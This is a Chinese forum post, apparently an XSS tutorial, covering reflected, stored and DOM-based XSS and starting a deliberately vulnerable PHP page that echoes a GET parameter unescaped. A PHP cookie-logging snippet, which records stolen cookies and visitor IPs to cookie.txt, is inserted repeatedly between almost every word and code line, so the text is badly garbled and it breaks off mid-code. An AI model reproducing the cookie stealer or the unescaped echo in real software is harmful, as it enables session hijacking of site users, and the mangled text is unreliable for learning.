xss实战

曹旭辉  金牌会员 | 2022-10-25 23:23:22 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 838|帖子 838|积分 2514

一、xss漏洞原理

1.什么是xss漏洞?

跨站点脚本(也称为<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS)是一种<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Web<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 安全漏洞,允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过同源策略,该策略旨在将不同的网站相互隔离。跨站点脚本漏洞通常允许攻击者伪装成受害者用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害者用户在应用程序中具有特权访问权限,那么攻击者可能能够完全控制应用程序的所有功能和数据。
2.xss分类

1)反射型xss

是最简单的跨站点脚本。当应用程序接收到<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> HTTP<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 请求中的数据并以不安全的方式将该数据包含在即时响应中时,就会出现这种情况。
如果用户访问攻击者构建的<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> URL,则攻击者的脚本会在用户的浏览器中执行,在该用户与应用程序的会话上下文中。此时,脚本可以执行任何操作,并检索用户有权访问的任何数据。

2)存储型xss

当应用程序从不受信任的来源接收数据并以不安全的方式将该数据包含在其以后的<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> HTTP<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 响应中时,就会出现存储的跨站点脚本
反射型<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 和存储型<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 的区别
反射型<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 和存储型<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 之间的主要区别在于,存储型<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 漏洞会导致在应用程序本身内自包含的攻击。攻击者不需要寻找外部方法来诱导其他用户发出包含其漏洞利用的特定请求。相反,攻击者将他们的漏洞利用放入应用程序本身,并等待用户遇到它。

3)DOM型xss

基于<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> DOM<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 的<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 漏洞通常出现在<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> JavaScript<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 从攻击者可控制的来源(例如<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> URL)获取数据并将其传递到支持动态代码执行的接收器(例如eval()或innerHTML.<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 这使攻击者能够执行恶意<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> JavaScript,这通常允许他们劫持其他用户的帐户。
要进行基于<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> DOM<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 的<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 攻击,您需要将数据放入源中,以便将其传播到接收器并导致执行任意<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> JavaScript。
DOM<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 最常见的来源是<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> URL,通常通过window.location对象访问。攻击者可以构建一个链接,将受害者发送到易受攻击的页面,其中包含查询字符串中的有效负载和<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> URL<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 的片段部分。在某些情况下,例如针对<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 404<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 页面或运行<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> PHP<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 的网站时,有效负载也可以放置在路径中。

二、xss漏洞实战

1.编写一个存在xss的页面
  1. <!DOCTYPE<?php
  2. $cookie = $_GET['cookie'];
  3. $ip = getenv ('REMOTE_ADDR');
  4. $time = date('Y-m-d g:i:s');
  5. $fp = fopen("cookie.txt","a");
  6. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  7. fclose($fp);
  8. ?> html><html>
  9. <?php
  10. $cookie = $_GET['cookie'];
  11. $ip = getenv ('REMOTE_ADDR');
  12. $time = date('Y-m-d g:i:s');
  13. $fp = fopen("cookie.txt","a");
  14. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  15. fclose($fp);
  16. ?> <?php
  17. $cookie = $_GET['cookie'];
  18. $ip = getenv ('REMOTE_ADDR');
  19. $time = date('Y-m-d g:i:s');
  20. $fp = fopen("cookie.txt","a");
  21. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  22. fclose($fp);
  23. ?> <head>
  24. <?php
  25. $cookie = $_GET['cookie'];
  26. $ip = getenv ('REMOTE_ADDR');
  27. $time = date('Y-m-d g:i:s');
  28. $fp = fopen("cookie.txt","a");
  29. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  30. fclose($fp);
  31. ?> <?php
  32. $cookie = $_GET['cookie'];
  33. $ip = getenv ('REMOTE_ADDR');
  34. $time = date('Y-m-d g:i:s');
  35. $fp = fopen("cookie.txt","a");
  36. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  37. fclose($fp);
  38. ?> <?php
  39. $cookie = $_GET['cookie'];
  40. $ip = getenv ('REMOTE_ADDR');
  41. $time = date('Y-m-d g:i:s');
  42. $fp = fopen("cookie.txt","a");
  43. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  44. fclose($fp);
  45. ?> <?php
  46. $cookie = $_GET['cookie'];
  47. $ip = getenv ('REMOTE_ADDR');
  48. $time = date('Y-m-d g:i:s');
  49. $fp = fopen("cookie.txt","a");
  50. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  51. fclose($fp);
  52. ?> <meta<?php
  53. $cookie = $_GET['cookie'];
  54. $ip = getenv ('REMOTE_ADDR');
  55. $time = date('Y-m-d g:i:s');
  56. $fp = fopen("cookie.txt","a");
  57. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  58. fclose($fp);
  59. ?> http-equiv="content-type"<?php
  60. $cookie = $_GET['cookie'];
  61. $ip = getenv ('REMOTE_ADDR');
  62. $time = date('Y-m-d g:i:s');
  63. $fp = fopen("cookie.txt","a");
  64. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  65. fclose($fp);
  66. ?> content="text/html;charset=utf-8">
  67. <?php
  68. $cookie = $_GET['cookie'];
  69. $ip = getenv ('REMOTE_ADDR');
  70. $time = date('Y-m-d g:i:s');
  71. $fp = fopen("cookie.txt","a");
  72. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  73. fclose($fp);
  74. ?> <?php
  75. $cookie = $_GET['cookie'];
  76. $ip = getenv ('REMOTE_ADDR');
  77. $time = date('Y-m-d g:i:s');
  78. $fp = fopen("cookie.txt","a");
  79. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  80. fclose($fp);
  81. ?> <?php
  82. $cookie = $_GET['cookie'];
  83. $ip = getenv ('REMOTE_ADDR');
  84. $time = date('Y-m-d g:i:s');
  85. $fp = fopen("cookie.txt","a");
  86. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  87. fclose($fp);
  88. ?> <?php
  89. $cookie = $_GET['cookie'];
  90. $ip = getenv ('REMOTE_ADDR');
  91. $time = date('Y-m-d g:i:s');
  92. $fp = fopen("cookie.txt","a");
  93. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  94. fclose($fp);
  95. ?>
  96. <?php
  97. $cookie = $_GET['cookie'];
  98. $ip = getenv ('REMOTE_ADDR');
  99. $time = date('Y-m-d g:i:s');
  100. $fp = fopen("cookie.txt","a");
  101. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  102. fclose($fp);
  103. ?> <?php
  104. $cookie = $_GET['cookie'];
  105. $ip = getenv ('REMOTE_ADDR');
  106. $time = date('Y-m-d g:i:s');
  107. $fp = fopen("cookie.txt","a");
  108. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  109. fclose($fp);
  110. ?> <?php
  111. $cookie = $_GET['cookie'];
  112. $ip = getenv ('REMOTE_ADDR');
  113. $time = date('Y-m-d g:i:s');
  114. $fp = fopen("cookie.txt","a");
  115. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  116. fclose($fp);
  117. ?> <?php
  118. $cookie = $_GET['cookie'];
  119. $ip = getenv ('REMOTE_ADDR');
  120. $time = date('Y-m-d g:i:s');
  121. $fp = fopen("cookie.txt","a");
  122. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  123. fclose($fp);
  124. ?> <title>欢迎来到level1</title>
  125. <?php
  126. $cookie = $_GET['cookie'];
  127. $ip = getenv ('REMOTE_ADDR');
  128. $time = date('Y-m-d g:i:s');
  129. $fp = fopen("cookie.txt","a");
  130. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  131. fclose($fp);
  132. ?> <?php
  133. $cookie = $_GET['cookie'];
  134. $ip = getenv ('REMOTE_ADDR');
  135. $time = date('Y-m-d g:i:s');
  136. $fp = fopen("cookie.txt","a");
  137. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  138. fclose($fp);
  139. ?> </head>
  140. <?php
  141. $cookie = $_GET['cookie'];
  142. $ip = getenv ('REMOTE_ADDR');
  143. $time = date('Y-m-d g:i:s');
  144. $fp = fopen("cookie.txt","a");
  145. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  146. fclose($fp);
  147. ?> <?php
  148. $cookie = $_GET['cookie'];
  149. $ip = getenv ('REMOTE_ADDR');
  150. $time = date('Y-m-d g:i:s');
  151. $fp = fopen("cookie.txt","a");
  152. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  153. fclose($fp);
  154. ?> <body>
  155. <?php
  156. $cookie = $_GET['cookie'];
  157. $ip = getenv ('REMOTE_ADDR');
  158. $time = date('Y-m-d g:i:s');
  159. $fp = fopen("cookie.txt","a");
  160. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  161. fclose($fp);
  162. ?> <?php
  163. $cookie = $_GET['cookie'];
  164. $ip = getenv ('REMOTE_ADDR');
  165. $time = date('Y-m-d g:i:s');
  166. $fp = fopen("cookie.txt","a");
  167. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  168. fclose($fp);
  169. ?> <?php
  170. $cookie = $_GET['cookie'];
  171. $ip = getenv ('REMOTE_ADDR');
  172. $time = date('Y-m-d g:i:s');
  173. $fp = fopen("cookie.txt","a");
  174. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  175. fclose($fp);
  176. ?> <?php
  177. $cookie = $_GET['cookie'];
  178. $ip = getenv ('REMOTE_ADDR');
  179. $time = date('Y-m-d g:i:s');
  180. $fp = fopen("cookie.txt","a");
  181. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  182. fclose($fp);
  183. ?> <h1<?php
  184. $cookie = $_GET['cookie'];
  185. $ip = getenv ('REMOTE_ADDR');
  186. $time = date('Y-m-d g:i:s');
  187. $fp = fopen("cookie.txt","a");
  188. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  189. fclose($fp);
  190. ?> align=center>欢迎来到level1</h1>
  191. <?php
  192. $cookie = $_GET['cookie'];
  193. $ip = getenv ('REMOTE_ADDR');
  194. $time = date('Y-m-d g:i:s');
  195. $fp = fopen("cookie.txt","a");
  196. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  197. fclose($fp);
  198. ?> <?php
  199. $cookie = $_GET['cookie'];
  200. $ip = getenv ('REMOTE_ADDR');
  201. $time = date('Y-m-d g:i:s');
  202. $fp = fopen("cookie.txt","a");
  203. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  204. fclose($fp);
  205. ?> <?php
  206. $cookie = $_GET['cookie'];
  207. $ip = getenv ('REMOTE_ADDR');
  208. $time = date('Y-m-d g:i:s');
  209. $fp = fopen("cookie.txt","a");
  210. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  211. fclose($fp);
  212. ?> <?php
  213. $cookie = $_GET['cookie'];
  214. $ip = getenv ('REMOTE_ADDR');
  215. $time = date('Y-m-d g:i:s');
  216. $fp = fopen("cookie.txt","a");
  217. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  218. fclose($fp);
  219. ?> <?php<?php
  220. $cookie = $_GET['cookie'];
  221. $ip = getenv ('REMOTE_ADDR');
  222. $time = date('Y-m-d g:i:s');
  223. $fp = fopen("cookie.txt","a");
  224. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  225. fclose($fp);
  226. ?>
  227. <?php
  228. $cookie = $_GET['cookie'];
  229. $ip = getenv ('REMOTE_ADDR');
  230. $time = date('Y-m-d g:i:s');
  231. $fp = fopen("cookie.txt","a");
  232. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  233. fclose($fp);
  234. ?> <?php
  235. $cookie = $_GET['cookie'];
  236. $ip = getenv ('REMOTE_ADDR');
  237. $time = date('Y-m-d g:i:s');
  238. $fp = fopen("cookie.txt","a");
  239. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  240. fclose($fp);
  241. ?> <?php
  242. $cookie = $_GET['cookie'];
  243. $ip = getenv ('REMOTE_ADDR');
  244. $time = date('Y-m-d g:i:s');
  245. $fp = fopen("cookie.txt","a");
  246. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  247. fclose($fp);
  248. ?> <?php
  249. $cookie = $_GET['cookie'];
  250. $ip = getenv ('REMOTE_ADDR');
  251. $time = date('Y-m-d g:i:s');
  252. $fp = fopen("cookie.txt","a");
  253. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  254. fclose($fp);
  255. ?> ini_set("display_errors",<?php
  256. $cookie = $_GET['cookie'];
  257. $ip = getenv ('REMOTE_ADDR');
  258. $time = date('Y-m-d g:i:s');
  259. $fp = fopen("cookie.txt","a");
  260. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  261. fclose($fp);
  262. ?> 0);<?php
  263. $cookie = $_GET['cookie'];
  264. $ip = getenv ('REMOTE_ADDR');
  265. $time = date('Y-m-d g:i:s');
  266. $fp = fopen("cookie.txt","a");
  267. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  268. fclose($fp);
  269. ?> <?php
  270. $cookie = $_GET['cookie'];
  271. $ip = getenv ('REMOTE_ADDR');
  272. $time = date('Y-m-d g:i:s');
  273. $fp = fopen("cookie.txt","a");
  274. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  275. fclose($fp);
  276. ?> <?php
  277. $cookie = $_GET['cookie'];
  278. $ip = getenv ('REMOTE_ADDR');
  279. $time = date('Y-m-d g:i:s');
  280. $fp = fopen("cookie.txt","a");
  281. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  282. fclose($fp);
  283. ?> //不显示错误报告
  284. <?php
  285. $cookie = $_GET['cookie'];
  286. $ip = getenv ('REMOTE_ADDR');
  287. $time = date('Y-m-d g:i:s');
  288. $fp = fopen("cookie.txt","a");
  289. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  290. fclose($fp);
  291. ?> <?php
  292. $cookie = $_GET['cookie'];
  293. $ip = getenv ('REMOTE_ADDR');
  294. $time = date('Y-m-d g:i:s');
  295. $fp = fopen("cookie.txt","a");
  296. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  297. fclose($fp);
  298. ?> <?php
  299. $cookie = $_GET['cookie'];
  300. $ip = getenv ('REMOTE_ADDR');
  301. $time = date('Y-m-d g:i:s');
  302. $fp = fopen("cookie.txt","a");
  303. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  304. fclose($fp);
  305. ?> <?php
  306. $cookie = $_GET['cookie'];
  307. $ip = getenv ('REMOTE_ADDR');
  308. $time = date('Y-m-d g:i:s');
  309. $fp = fopen("cookie.txt","a");
  310. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  311. fclose($fp);
  312. ?> $str<?php
  313. $cookie = $_GET['cookie'];
  314. $ip = getenv ('REMOTE_ADDR');
  315. $time = date('Y-m-d g:i:s');
  316. $fp = fopen("cookie.txt","a");
  317. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  318. fclose($fp);
  319. ?> =<?php
  320. $cookie = $_GET['cookie'];
  321. $ip = getenv ('REMOTE_ADDR');
  322. $time = date('Y-m-d g:i:s');
  323. $fp = fopen("cookie.txt","a");
  324. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  325. fclose($fp);
  326. ?> $_GET["name"];<?php
  327. $cookie = $_GET['cookie'];
  328. $ip = getenv ('REMOTE_ADDR');
  329. $time = date('Y-m-d g:i:s');
  330. $fp = fopen("cookie.txt","a");
  331. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  332. fclose($fp);
  333. ?>                         //获取参数传入
  334. <?php
  335. $cookie = $_GET['cookie'];
  336. $ip = getenv ('REMOTE_ADDR');
  337. $time = date('Y-m-d g:i:s');
  338. $fp = fopen("cookie.txt","a");
  339. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  340. fclose($fp);
  341. ?> <?php
  342. $cookie = $_GET['cookie'];
  343. $ip = getenv ('REMOTE_ADDR');
  344. $time = date('Y-m-d g:i:s');
  345. $fp = fopen("cookie.txt","a");
  346. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  347. fclose($fp);
  348. ?> <?php
  349. $cookie = $_GET['cookie'];
  350. $ip = getenv ('REMOTE_ADDR');
  351. $time = date('Y-m-d g:i:s');
  352. $fp = fopen("cookie.txt","a");
  353. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  354. fclose($fp);
  355. ?> <?php
  356. $cookie = $_GET['cookie'];
  357. $ip = getenv ('REMOTE_ADDR');
  358. $time = date('Y-m-d g:i:s');
  359. $fp = fopen("cookie.txt","a");
  360. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  361. fclose($fp);
  362. ?> echo<?php
  363. $cookie = $_GET['cookie'];
  364. $ip = getenv ('REMOTE_ADDR');
  365. $time = date('Y-m-d g:i:s');
  366. $fp = fopen("cookie.txt","a");
  367. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  368. fclose($fp);
  369. ?> "<h2<?php
  370. $cookie = $_GET['cookie'];
  371. $ip = getenv ('REMOTE_ADDR');
  372. $time = date('Y-m-d g:i:s');
  373. $fp = fopen("cookie.txt","a");
  374. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  375. fclose($fp);
  376. ?> align=center>欢迎用户".$str."</h2>";<?php
  377. $cookie = $_GET['cookie'];
  378. $ip = getenv ('REMOTE_ADDR');
  379. $time = date('Y-m-d g:i:s');
  380. $fp = fopen("cookie.txt","a");
  381. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  382. fclose($fp);
  383. ?> <?php
  384. $cookie = $_GET['cookie'];
  385. $ip = getenv ('REMOTE_ADDR');
  386. $time = date('Y-m-d g:i:s');
  387. $fp = fopen("cookie.txt","a");
  388. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  389. fclose($fp);
  390. ?> //用户输入什么就输出什么
  391. <?php
  392. $cookie = $_GET['cookie'];
  393. $ip = getenv ('REMOTE_ADDR');
  394. $time = date('Y-m-d g:i:s');
  395. $fp = fopen("cookie.txt","a");
  396. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  397. fclose($fp);
  398. ?> <?php
  399. $cookie = $_GET['cookie'];
  400. $ip = getenv ('REMOTE_ADDR');
  401. $time = date('Y-m-d g:i:s');
  402. $fp = fopen("cookie.txt","a");
  403. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  404. fclose($fp);
  405. ?> <?php
  406. $cookie = $_GET['cookie'];
  407. $ip = getenv ('REMOTE_ADDR');
  408. $time = date('Y-m-d g:i:s');
  409. $fp = fopen("cookie.txt","a");
